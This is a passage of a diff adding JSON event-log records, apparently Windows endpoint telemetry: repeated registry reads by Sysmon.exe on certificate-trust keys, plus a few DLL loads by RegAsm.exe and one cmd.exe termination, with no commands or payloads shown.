"{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570868710000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 
131883570868710000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570868710000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "image_load", + "image_name": "sfc_os.dll", + "image_path": "C:\\Windows\\SysWOW64\\sfc_os.dll", + "pid": 5012, + "process_name": "RegAsm.exe", + "process_path": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegAsm.exe", + "timestamp": 131883570865280000, + "unique_pid": "{42FC7E13-CADE-5C05-0000-0010ED3A4D01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570868710000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570868710000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": 
"Certificates", + "timestamp": 131883570868710000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570868710000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570868710000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570868710000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570868710000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": 
"HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570868710000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570868710000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570868710000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570868710000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570868710000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + 
"event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570868710000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570868710000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883570868710000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883570868710000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": 
"HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883570868710000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570868860000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570868860000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570868860000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 
131883570868860000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570868860000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570868860000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570868860000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570868860000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + 
"registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570868860000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570868860000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570868860000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570868860000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570868860000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": 
"registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570868860000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570868860000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570868860000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570868860000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": 
"HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570868860000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570868860000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570868860000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570868860000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570868860000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": 
"C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570868860000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883570868860000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "process", + "pid": 6712, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "subtype": "terminate", + "timestamp": 131883570868860000, + "unique_pid": "{42FC7E13-CADE-5C05-0000-0010FC394D01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570868860000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570868860000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + 
"process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570868860000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570868860000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570868860000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570868860000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": 
"HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570868860000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570868860000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570868860000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570868860000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570868860000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": 
"Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570868860000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570868860000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570868860000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570868860000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 
131883570868860000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570868860000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "image_load", + "image_name": "mscoreei.dll", + "image_path": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscoreei.dll", + "pid": 5012, + "process_name": "RegAsm.exe", + "process_path": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegAsm.exe", + "timestamp": 131883570865430000, + "unique_pid": "{42FC7E13-CADE-5C05-0000-0010ED3A4D01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": 